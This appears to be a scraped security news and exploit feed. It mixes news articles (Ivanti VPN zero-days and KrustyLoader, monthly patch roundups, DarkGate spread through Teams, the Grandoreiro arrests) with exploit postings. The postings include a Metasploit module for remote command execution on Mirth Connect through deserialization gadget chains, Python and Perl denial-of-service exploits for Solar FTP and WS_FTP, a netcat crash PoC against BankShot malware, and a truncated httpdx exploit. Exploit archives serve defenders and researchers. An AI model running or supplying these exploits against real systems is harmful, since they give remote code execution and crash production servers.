By Deeba Ahmed
The Ivanti VPN vulnerabilities have plunged into a black hole.
This is a post from HackRead.com Read the original post: Ivanti VPN Flaws Exploited to Spread KrustyLoader Malware

Hackers exploit zero-day vulnerabilities in Ivanti VPN, deploying malware and cryptocurrency miners, with targets including Fortune 500 firms, gov’t agencies, and defence contractors.

Cybersecurity concerns are rising as hackers try to exploit zero-day vulnerabilities in Ivanti VPN devices to deploy malware and cryptocurrency miners. The vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887 were discovered in Ivanti Connect Secure (ICS) and Ivanti Policy Secure Gateway appliances, allowing attackers to execute arbitrary commands remotely on targeted hosts to load a Rust-based malware named KrustyLoader.

“Vulnerabilities have been discovered in Ivanti Connect Secure (ICS), formerly known as Pulse Connect Secure and Ivanti Policy Secure gateways. These vulnerabilities impact all supported versions – Version 9.x and 22.x,” Ivanti confirmed in a recent advisory.

CVE-2023-46805 is an Authentication Bypass flaw with a CVSS score of 8.2. It allows a remote attacker to bypass control checks in the web component of Ivanti ICS 9.x, 22.x, and Ivanti Policy Secure.

CVE-2024-21887, is a command injection vulnerability, with a CVSS score of 9.1. It is discovered in Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure web components, and allows an authenticated administrator to exploit Ivanti appliances by sending crafted requests and executing arbitrary commands.

Targets include global small to large businesses, including Fortune 500 companies, government departments, telecommunications, defence contractors, technology firms, banking, finance, accounting institutions, consulting services, and aerospace entities.

The issues were first reported by Volexity, according to which these vulnerabilities have been exploited as zero-days as early as 3 December 2023. They identified a Chinese threat actor named UTA0178 (tracked by Mandiant as UNC5221) to be responsible for this exploitation. Volexity was alerted after discovering an attacker executing webshells on multiple internal and external-facing web servers.

The company launched an investigation and discovered over 2,100 compromised Ivanti Connect Secure VPN devices using the GIFTEDVISITOR webshell in December 2023. A new scan in January 2024 revealed 368 more compromised devices.

Researchers inspected a compromised Connect Secure VPN appliance and found that UTA0178 made modifications to the in-built Integrity Checker Tool, causing the tool to report no new or mismatched files.

Synacktiv researcher Théo Letailleur conducted an extensive probe and discovered that threat actors are exploiting Ivanti zero-days to install an XMRig cryptocurrency miner and execute a Golang-based Sliver backdoor from a remote server.

KrustyLoader served as a loader to download/execute Sliver on compromised hosts. Since it is based on Rust language, it is challenging to fully comprehend the malware’s behaviour.

Bishop Fox’s Sliver is a post-exploitation toolkit designed for cybercriminals to maintain control over compromised systems. It gained popularity among cybercriminals in 2023 after law enforcement attempted to shut down ‘cracked’ versions of Cobalt Strike.

The backdoor offers extensive functionalities, including network spying, command execution, loading reflective DLLs, and spawning sessions. Synacktiv reports that all samples download Sliver from different URLs, and establish a connection with the C2 using HTTP/HTTPS communication.

Ivanti’s advisory suggests that if CVE-2024-21887 and CVE-2023-46805 are used together, an attacker can send malicious requests to unpatched systems without authentication, allowing arbitrary command execution.

Ivanti and Mandiant are working to address over 2100 system compromises, and a patch was scheduled for January 30. However, no patch is currently available.

****_RELATED ARTICLES_****

1.  **Critical Flaws Found in GNU C Library, Major Linux Distros at Risk**
2.  **Excessive Expansion Flaws Leave Jenkins Servers Open to Attacks**
3.  **Critical “PixieFail” Flaws Expose Millions of Devices to Cyberattacks**
4.  **TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware**
5.  **Windows Defender SmartScreen Flaw Exploited with Phemedrone Stealer**

Ivanti VPN Flaws Exploited to Spread KrustyLoader Malware

Trojan.Win32 BankShot malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/f2fd6a7b400782bb43499e722fb62cf4.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Trojan.Win32 BankShot  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 1978 and creates a local Windows service running with SYSTEM integrity. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH)  
Family: BankShot  
Type: PE32  
MD5: f2fd6a7b400782bb43499e722fb62cf4  
Vuln ID: MVID-2024-0669  
ASLR: Not Enabled  
DEP: Enabled  
SEH: Not Enabled  
CFG: Not Enabled  
Disclosure: 01/30/2024

Memory Dump:  
(16bc.cf8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for MouseServer.exe  
*** ERROR: Module load completed but symbols could not be loaded for MouseServer.exe  
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

EXCEPTION_RECORD:  0624dec4 -- (.exr 0x624dec4)  
ExceptionAddress: 0042a95e (MouseServer+0x0002a95e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 06250000  
Attempt to write to address 06250000

PROCESS_NAME:  MouseServer.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

FAILED_INSTRUCTION_ADDRESS:   
+2a95e  
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0624df14 -- (.cxr 0x624df14)  
eax=027fce88 ebx=0624fbfc ecx=000008d8 edx=00001d00 esi=027fc5b0 edi=06250000  
eip=0042a95e esp=0624e374 ebp=0624fbf0 iopl=0         nv up ei pl nz na po cy  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203  
MouseServer+0x2a95e:  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]  
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0042a95e

FRAME_ONE_INVALID: 1

STACK_TEXT:    
0624e374 0042a95e mouseserver+0x2a95e  
0624fbf8 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 000000000624DF14 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 624e374 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  mouseserver+2a95e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MouseServer

IMAGE_NAME:  MouseServer.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  58eb1b3a

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_MouseServer.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_mouseserver+2a95e

0:005> !exchain  
0624ddd4: ntdll!ExecuteHandler2+44 (77309d70)  
0624fbe4: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
C:\Users\gg\Desktop>python -c "print('A'*32000)" | nc64.exe x.x.x.x 1978  
system windows 6.2  
version 1.7.4.0  
serverid 7E8539FB-5E68-464F-AE62-129E95A7DFB8

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32 BankShot MVID-2024-0669 Buffer Overflow

Solar FTP Server version 2.1.1 remote denial of service exploit.

    #!/usr/bin/python# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 31 january 2024# Vendor Homepage:  N/A# Download to demo: # Notification vendor: No reported# Tested Version: Solar FTP Server 2.1.1# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: #1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.import socket,sys,time,structif len(sys.argv) < 2:     print("[-]Usage: %s <ip addr> " % sys.argv[0])          sys.exit(0)ip = sys.argv[1]if len(sys.argv) > 2:     platform = sys.argv[2]ret = struct.pack('<L', 0x7C9572D8)#works when the server is on 192.168.133.128padding = b"\x43" * 468junk = b"\x43" * 1532frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21payload = frontpad + ret + padding + junkprint ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")print ("[+] Connecting to "+ip)s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:    s.connect((ip,21))except:    print("[-] Connection to "+ip+" failed!")    sys.exit(0)print ("[+] Exploiting")print("[*] Sending payload to command PASV...")s.send(b"USER anon\r\n")s.recv(1024)s.send(b"PASS anon\r\n")s.recv(1024)s.send(b"PASV " + payload + b"\r\n")print("[+] Done - Exploited")

Solar FTP Server 2.1.1 Denial Of Service

A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the target application. The original vulnerability was identified by IHTeam and assigned CVE-2023-37679. Later, researchers from Horizon3.ai determined the patch to be incomplete and published a gadget chain which bypassed the deny list that the original had implemented. This second vulnerability was assigned CVE-2023-43208 and was patched in Mirth Connect version 4.4.1. This Metasploit module has been tested on versions 4.1.1, 4.3.0 and 4.4.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Mirth Connect Deserialization RCE',        'Description' => %q{          A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability          can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the          target application. The original vulnerability was identified by IHTeam and assigned CVE-2023-37679. Later,          researchers from Horizon3.ai determined the patch to be incomplete and published a gadget chain which bypassed          the deny list that the original had implemented. This second vulnerability was assigned CVE-2023-43208 and was          patched in Mirth Connect version 4.4.1. This module has been tested on versions 4.1.1, 4.3.0 and 4.4.0.        },        'Author' => [          'r00t',          'Naveen Sunkavally',          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-37679'],          ['URL', 'https://www.ihteam.net/advisory/mirth-connect/'],          ['CVE', '2023-43208'],          ['URL', 'https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/'],          ['URL', 'https://www.horizon3.ai/writeup-for-cve-2023-43208-nextgen-mirth-connect-pre-auth-rce/'],        ],        'DisclosureDate' => '2023-10-25',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('HTTP fingerprinting failed.') if res.nil?    unless res.get_html_document&.xpath('//head/title')&.first&.text =~ /Mirth Connect/      return CheckCode::Safe('The target is not Mirth Connect.')    end    target_version = get_target_version    return CheckCode::Detected('Failed to detect the target version.') unless target_version    vprint_status("Detected target version: #{target_version}")    if target_version <= Rex::Version.new('4.3.0')      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-37679.")    elsif target_version <= Rex::Version.new('4.4.0')      return CheckCode::Appears("Version #{target_version} is affected by CVE-2023-43208.")    end    CheckCode::Safe("Version #{target_version} is not affected.")  end  def get_target_version    return @target_version if @target_version    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/server/version'),      'headers' => {        'X-Requested-With' => 'OpenAPI'      }    )    return nil unless res&.code == 200    return nil unless res.body =~ /(\d+(\.\d+)*)/    @target_version = Rex::Version.new(Regexp.last_match(1))    @target_version  end  def exploit    target_version = get_target_version    print_status("Executing #{payload_instance.refname} (#{target.name})")    if target_version <= Rex::Version.new('4.3.0')      # The CVE-2023-43208 gadget chain will also work here but use the old one to verify the original vulnerability      # which did not implement the deny-list logic that was bypassed by the newer chain      res = execute_command_cve_2023_37679(payload.encoded)    elsif target_version <= Rex::Version.new('4.4.0')      res = execute_command_cve_2023_43208(payload.encoded)    else      fail_with(Failure::NoTarget, "Version #{target_version} is not vulnerable.")    end    if res.nil?      fail_with(Failure::Unreachable, 'Failed to execute the payload.')    elsif res.code != 500      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload.')    end    print_good('The target appears to have executed the payload.')  end  def execute_command_cve_2023_37679(cmd, _opts = {})    # Tested on 4.1.1 and 4.3.0    xml = Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)      <sorted-set>        <string>#{rand_text_alphanumeric(4..12)}</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">            <target class="java.lang.ProcessBuilder">              <command>                <string>#{target['Platform'] == 'win' ? 'cmd.exe' : 'sh'}</string>                <string>#{target['Platform'] == 'win' ? '/c' : '-c'}</string>                <string>#{cmd.encode(xml: :text)}</string>              </command>            </target>            <methodName>start</methodName>            <eventTypes/>          </handler>        </dynamic-proxy>      </sorted-set>    XML    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/users'),      'ctype' => 'application/xml',      'headers' => {        'X-Requested-With' => 'OpenAPI'      },      'data' => xml    })    res  end  def execute_command_cve_2023_43208(cmd, _opts = {})    if target['Platform'] == 'win'      cmd = "cmd.exe /c \"#{cmd}\""    else      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html      cmd = "sh -c $@|sh . echo #{cmd}"    end    # Tested on 4.1.1, 4.4.0    xml = Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)      <sorted-set>        <string>#{rand_text_alphanumeric(4..12)}</string>        <dynamic-proxy>          <interface>java.lang.Comparable</interface>          <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">            <target class="org.apache.commons.collections4.functors.ChainedTransformer">              <iTransformers>                <org.apache.commons.collections4.functors.ConstantTransformer>                  <iConstant class="java-class">java.lang.Runtime</iConstant>                </org.apache.commons.collections4.functors.ConstantTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>getMethod</iMethodName>                  <iParamTypes>                    <java-class>java.lang.String</java-class>                    <java-class>[Ljava.lang.Class;</java-class>                  </iParamTypes>                  <iArgs>                    <string>getRuntime</string>                    <java-class-array/>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>invoke</iMethodName>                  <iParamTypes>                    <java-class>java.lang.Object</java-class>                    <java-class>[Ljava.lang.Object;</java-class>                  </iParamTypes>                  <iArgs>                    <null/>                    <object-array/>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>                <org.apache.commons.collections4.functors.InvokerTransformer>                  <iMethodName>exec</iMethodName>                  <iParamTypes>                    <java-class>java.lang.String</java-class>                  </iParamTypes>                  <iArgs>                    <string>#{cmd.encode(xml: :text)}</string>                  </iArgs>                </org.apache.commons.collections4.functors.InvokerTransformer>              </iTransformers>            </target>            <methodName>transform</methodName>            <eventTypes>              <string>compareTo</string>            </eventTypes>          </handler>        </dynamic-proxy>      </sorted-set>    XML    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api/users'),      'ctype' => 'application/xml',      'headers' => {        'X-Requested-With' => 'OpenAPI'      },      'data' => xml    })    res  endend

Mirth Connect 4.4.0 Remote Command Execution

Plus: Google fixes dozens of Android bugs, Microsoft rolls out nearly 50 patches, Mozilla squashes 15 Firefox flaws, and more.

Later in January, Google released Chrome 121 to the stable channel, fixing 17 security issues, three of which are rated as having a high impact. These include CVE-2024-0807, a use-after-free flaw in WebAudio, and CVE-2024-0812, an inappropriate implementation vulnerability in accessibility. The final high-impact vulnerability is CVE-2024-0808, an integer underflow in WebUI.

Obviously, these updates are important, so check and apply them as soon as you can.

Microsoft

Microsoft’s January Patch Tuesday squashes nearly 50 bugs in its popular software, including 12 remote code execution (RCE) flaws.

No security holes included in this month’s set of updates are known to have been used in attacks, but notable flaws include CVE-2024-20677, a bug in Microsoft Office that could allow attackers to create malicious documents with embedded FBX 3D model files to execute code.

To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint, and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it, Microsoft said.

Meanwhile, CVE-2024-20674 is a Windows Kerberos security feature bypass vulnerability rated as critical with a CVSS score of 8.8. In one scenario for this vulnerability, the attacker could convince a victim to connect to an attacker-controlled malicious application, Microsoft said. “Upon connecting, the malicious server could compromise the protocol,” the software giant added.

Mozilla Firefox

Hot on the heels of its market-dominant competitor Chrome, Mozilla’s Firefox has patched 15 security flaws in its latest update. Five of the bugs are rated as having a high severity, including CVE-2024-0741, an out-of-bounds write issue in Angle that could allow an attacker to corrupt memory, leading to an exploitable crash.

An unchecked return value in TLS handshake code tracked as CVE-2024-0743 could also cause an exploitable crash.

CVE-2024-0755 covers memory safety bugs fixed in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

Cisco

Enterprise software giant Cisco has patched a vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products that could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

Tracked as CVE-2024-20253 and with a whopping CVSS score of 9.9, Cisco said an attacker could exploit the vulnerability by sending a crafted message to a listening port of an affected device.

“A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user,” Cisco said. “With access to the underlying operating system, the attacker could also establish root access on the affected device,” it warned.

SAP

SAP has issued 10 new security fixes as part of its January Security Patch Day, which includes several issues with a CVSS score of 9.1. CVE-2023-49583 is an escalation-of-privilege issue in applications developed through SAP Business Application Studio, SAP Web IDE Full-Stack, and SAP Web IDE for SAP HANA.

Meanwhile, CVE-2023-50422 and CVE-2023-49583 are escalation-of-privilege issues in SAP Edge Integration Cell.

Another notable flaw is CVE-2024-21737, a code injection vulnerability in SAP Application Interface Framework, which has a CVSS score of 8.4. “A vulnerable function module of the application allows an attacker to traverse through various layers and execute OS commands directly,” security firm Onapsis said. “Successful exploits can cause considerable impact on confidentiality, integrity, and availability of the application.”

Apple and Google Just Patched Their First Zero-Day Flaws of the Year

By Waqas
Threat actors are exploiting Microsoft Teams' External Access feature to spread DarkGate malware through chats.
This is a post from HackRead.com Read the original post: Microsoft Teams External Access Abuses to Spread DarkGate Malware

AT&T Cybersecurity warns of a new threat: Microsoft Teams targeted for phishing and malware attacks. Learn how to protect your organization against these evolving cyber threats.

Cybersecurity experts from AT&T Cybersecurity have uncovered a concerning trend: Microsoft Teams, the widely used collaboration platform, being exploited as a vector for phishing scams and malware attacks.

While traditional phishing via email remains a pervasive threat, the integration of External Access in Microsoft Teams has opened up a new frontier for malicious actors to exploit. For your information, External Access enables streamlined communication and collaboration with individuals outside your organization using Teams, Skype for Business, or Skype.

In a recent incident reported by AT&T Cybersecurity’s Managed Detection and Response (MDR) team, a client raised alarms after an external user, not affiliated with their organization, initiated unsolicited Microsoft Teams chats with internal members. Suspicions were raised, and upon investigation, it was confirmed that the chats were indeed phishing lures.

Message sent by the malicious external user, user tenant ID, Member Added event and the malicious file used in the attack (Screenshots: AT&T Cybersecurity)

The sophistication of the attack was revealed in a blog post published on January 30, 2024, as the MDR team delved deeper into the incident. Analysis of the tactics and indicators of compromise (IOCs) employed by the attacker uncovered associations with DarkGate malware, a notorious threat in the large as well we small businesses.

The DarkGate malware first emerged on December 25th, 2017, initially functioning as a password stealer and cryptocurrency miner, primarily spreading through Torrent files. It was identified by enSilo researcher Adi Zeligson, who observed its targeting of Windows workstations.

In October 2023, DarkGate resurfaced, this time associated with threat actors based in Vietnam. Their latest campaign focused on infiltrating META accounts, particularly in India, the United States, and the United Kingdom.

As for the latest attack, the timely intervention of the MDR SOC team thwarted the attack before significant damage could occur, showcasing the importance of proactive cybersecurity measures.

Key to the investigation was the identification of suspicious activities within the Teams environment. Over 1,000 Microsoft Teams events were flagged, indicating the scope of the phishing attempt. By leveraging Microsoft 365 tenant IDs and meticulously tracing chat interactions, the MDR SOC team successfully pinpointed compromised accounts and assets for remediation.

Further examination revealed that some users had unwittingly downloaded double-extension files, a common tactic used by attackers to conceal malicious executables. Armed with this information, the client swiftly took action, initiating password resets and isolating infected assets to contain the threat.

As organizations increasingly rely on collaboration platforms like Teams for remote work, they must remain alert against emerging threats. Recommendations from AT&T Cybersecurity include considering the disabling of External Access in Microsoft Teams, unless essential for business operations, and reinforcing user training to recognize and report phishing attempts across all communication channels.

****_RELATED ARTICLES_****

1.  **Microsoft Executives’ Emails Breached by Russia Hackers**
2.  **Hackers are using Microsoft Teams chat to spread malware**
3.  **Zoom Phishing Scam Steals Microsoft Exchange Credentials**
4.  **Flaw allowed hijacking of Microsoft Teams account with a GIF**
5.  **Microsoft Disables App Installer Feature After Malware Abuse**

Microsoft Teams External Access Abuses to Spread DarkGate Malware

A Brazilian law enforcement operation has led to the arrest of several Brazilian operators in charge of the Grandoreiro malware.
The Federal Police of Brazil said it served five temporary arrest warrants and 13 search and seizure warrants in the states of São Paulo, Santa Catarina, Pará, Goiás, and Mato Grosso.
Slovak cybersecurity firm ESET, which provided additional

A Brazilian law enforcement operation has led to the arrest of several Brazilian operators in charge of the **Grandoreiro** malware.

The Federal Police of Brazil said it served five temporary arrest warrants and 13 search and seizure warrants in the states of São Paulo, Santa Catarina, Pará, Goiás, and Mato Grosso.

Slovak cybersecurity firm ESET, which provided additional assistance in the effort, said it uncovered a design flaw in Grandoreiro's network protocol that helped it to identify the victimology patterns.

Grandoreiro is one of the many Latin American banking trojans such as Javali, Melcoz, Casabeniero, Mekotio, and Vadokrist, primarily targeting countries like Spain, Mexico, Brazil, and Argentina. It's known to be active since 2017.

In late October 2023, Proofpoint revealed details of a phishing campaign that distributed an updated version of the malware to targets in Mexico and Spain.

The banking trojan has capabilities to both steal data through keyloggers and screenshots as well as siphon bank login information from overlays when an infected victim visits pre-determined banking sites targeted by the threat actors. It can also display fake pop-up windows and block the victim's screen.

Attack chains typically leverage phishing lures bearing decoy documents or malicious URLs that, when opened or clicked, lead to the deployment of malware, which then establishes contact with a command-and-control (C&C) server for remotely controlling the machine in a manual fashion.

"Grandoreiro periodically monitors the foreground window to find one that belongs to a web browser process," ESET said.

"When such a window is found and its name matches any string from a hardcoded list of bank-related strings, then and only then the malware initiates communication with its C&C server, sending requests at least once a second until terminated."

The threat actors behind the malware are also known to employ a domain generation algorithm (DGA) since around October 2020 to dynamically identify a destination domain for C&C traffic, making it harder to block, track, or take over the infrastructure.

A majority of the IP addresses these domains resolve to are provided primarily by Amazon Web Services (AWS) and Microsoft Azure, with the life span of the C&C IP addresses ranging anywhere between 1 day to 425 days. On average, there are 13 active and three new C&C IP addresses per day, respectively.

ESET also said that Grandoreiro's flawed implementation of its RealThinClient (RTC) network protocol for C&C made it possible to get information about the number of victims that are connected to the C&C server, which is 551 unique victims in a day on average mainly spread across Brazil, Mexico, and Spain.

Further investigation has found that an average number of 114 new unique victims connect to the C&C servers each day.

"The disruption operation led by the Federal Police of Brazil aimed at individuals who are believed to be high up in the Grandoreiro operation hierarchy," ESET said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Brazilian Feds Dismantle Grandoreiro Banking Trojan, Arresting Top Operatives

WS_FTP Server version 5.0.5 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 30 january 2024  
# Vendor Homepage:  N/A  
# Notification vendor: No reported  
# Tested Version: 5.0.5  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description about vunerability and exploited

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit we intentionally increased the number of bytes sent to the server to process.  
#We concluded that the FTP server does not correctly manage the amount of data or bytes sent and processed, causing denied service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

    my $exploit = "\x41"x676;  
    $exploit .=  "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e";  
    $exploit .=  "\x42"x3000;  
    $exploit .=  "\r\n";

        my $sock = IO::Socket::INET->new(  
        PeerAddr => $target->$ip,  
        PeerPort => $target->$port,  
        Proto    => 'tcp',  
    ) or die "Not connect to $ip:$port: $!";

    my $response = <$sock>;  
    print "Connected => $response";

      $sock->send("USER $ftp_user\r\n");  
      $response = <$sock>;  
      print "Authentication USER: $response";

      $sock->send("PASS $ftp_pass\r\n");  
      $response = <$sock>;  
      print "Authentication PASSWORD: $response";

        $sock->send("MKD ".$exploit);  
        $response = <$sock>;  
        print "Exploited : $response";

sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= ------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

WS_FTP Server 5.0.5 Denial Of Service

httpdx version 1.5.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 30 january 2024  
# Vendor Homepage:  http://httpdx.sourceforge.net  
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.1/  
# Notification vendor: No reported  
# Tested Version: httpdx 1.5.1 - Denial of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=EFtRwGVzx4s

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
